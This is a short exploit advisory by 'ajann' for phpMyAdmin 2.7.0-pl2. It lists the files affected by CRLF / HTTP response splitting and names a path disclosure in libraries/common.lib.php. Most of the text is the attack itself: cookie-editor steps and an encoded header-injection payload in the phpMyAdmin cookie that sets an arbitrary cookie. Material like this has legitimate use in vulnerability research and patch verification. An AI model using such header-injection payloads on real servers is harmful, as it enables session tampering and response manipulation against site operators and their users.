PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting
*************************************************************************************
# Title : PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response
Splitting Vulnerability
# Author : ajann
# Contact : :(
# Tested : Just 2.7.0-pl2
*************************************************************************************
[[CRLF]]]------------------------------------------------------
Files----
/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..
/Files----
Cookie:
->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;
phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue
New Cookie => some=value
.....
..
[[/CRLF]]]
[[PATH]]]------------------------------------------------------
File----
//libraries/common.lib.php
/File----
[[/PATH]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!